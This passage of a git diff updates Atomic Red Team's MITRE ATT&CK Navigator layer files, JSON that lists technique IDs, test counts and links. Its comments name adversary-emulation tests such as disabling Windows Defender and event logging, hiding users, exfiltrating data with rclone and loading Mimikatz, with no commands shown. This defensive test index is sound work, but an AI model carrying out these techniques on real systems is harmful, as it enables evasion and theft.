LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell\n- Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell\n- Disable Windows Defender with PwSh Disable-WindowsOptionalFeature\n- WMIC Tamper with Windows Defender Evade Scanning Folder\n- Delete Windows Defender Scheduled Tasks\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"comment":"\n- Disable Windows IIS HTTP Logging\n- Disable Windows IIS HTTP Logging via PowerShell\n- Kill Event Log Service Threads\n- Impair Windows Audit Log Policy\n- Clear Windows Audit Policy Config\n- Disable Event Logging with wevtutil\n- Makes Eventlog blind with Phant0m\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.004","score":9,"enabled":true,"comment":"\n- Disable Microsoft Defender Firewall\n- Disable Microsoft Defender Firewall via Registry\n- Allow SMB and RDP on Microsoft Defender Firewall\n- Opening ports for proxy - HARDRAIN\n- Open a local port through Windows Firewall to any profile\n- Allow Executable Through Firewall Located in Non-Standard Location\n- LockBit Black - Unusual Windows firewall registry modification -cmd\n- LockBit Black - Unusual Windows firewall registry modification -Powershell\n- Blackbit - Disable Windows Firewall using netsh firewall\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":5,"enabled":true,"comment":"\n- Disable Powershell ETW Provider - Windows\n- Disable .NET Event Tracing for Windows Via Registry (cmd)\n- Disable .NET Event Tracing for Windows Via Registry (powershell)\n- LockBit Black - Disable the ETW Provider of Windows Defender -cmd\n- LockBit Black - Disable the ETW Provider of Windows Defender -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"comment":"\n- RDP hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}],"comment":"\n- Extract binary files via VBA\n- Create a Hidden User Called \"$\"\n- Create an \"Administrator \" user (with a space on the end)\n- Create and Hide a Service with sc.exe\n"},{"techniqueID":"T1564.001","score":3,"enabled":true,"comment":"\n- Create Windows System File with Attrib\n- Create Windows Hidden File with Attrib\n- Hide Files Through Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":1,"enabled":true,"comment":"\n- Create Hidden User in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":1,"enabled":true,"comment":"\n- Hidden Window\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":4,"enabled":true,"comment":"\n- Alternate Data Streams (ADS)\n- Store file in Alternate Data Stream (ADS)\n- Create ADS command prompt\n- Create ADS PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"comment":"\n- Register Portable Virtualbox\n- Create and start VirtualBox virtual machine\n- Create and start Hyper-V virtual machine\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"comment":"\n- Download Macro-Enabled Phishing Attachment\n- Word spawned a command shell and used an IP address in the command line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data with rclone to cloud Storage - Mega (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1569","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.002","score":3,"enabled":true,"comment":"\n- Execute a Command as a Service\n- Use PsExec to execute a command on a remote host\n- BlackCat pre-encryption cmds with Lateral Movement\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1571","score":1,"enabled":true,"comment":"\n- Testing usage of uncommonly used port with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":3,"enabled":true,"comment":"\n- DNS over HTTPS Large Query Volume\n- DNS over HTTPS Regular Beaconing\n- DNS over HTTPS Long Domain Query\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"comment":"\n- OpenSSL C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"comment":"\n- DLL Search Order Hijacking - amsi.dll\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"comment":"\n- DLL Side-Loading using the Notepad++ GUP.exe binary\n- DLL Side-Loading using the dotnet startup hook environment variable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"comment":"\n- powerShell Persistence via hijacking default modules - Get-Variable.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"comment":"\n- Execution of program.exe as service with unquoted service path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"comment":"\n- Service Registry Permissions Weakness\n- Service ImagePath Change with reg.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"comment":"\n- User scope COR_PROFILER\n- System Scope COR_PROFILER\n- Registry-free process scope COR_PROFILER\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"comment":"\n- Enumerate PlugNPlay Camera\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1614","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":2,"enabled":true,"comment":"\n- Discover System Language by Registry Query\n- Discover System Language with chcp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"comment":"\n- Display group policy information via gpresult\n- Get-DomainGPO to display group policy information via PowerView\n- WinPwn - GPOAudit\n- WinPwn - GPORemoteAccessPolicy\n- MSFT Get-GPO Cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"comment":"\n- WinPwn - Reflectively load Mimik@tz into memory\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
index 24e2595a..1768aeca 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
@@ -1 +1 @@
-{"name":"Atomic Red Team","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":44,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.001","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.005","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1055","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.012","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1056","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":48,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.003","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.004","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":42,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1071","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":27,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":29,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":3,"enabled":true,"links":[{"label":"View 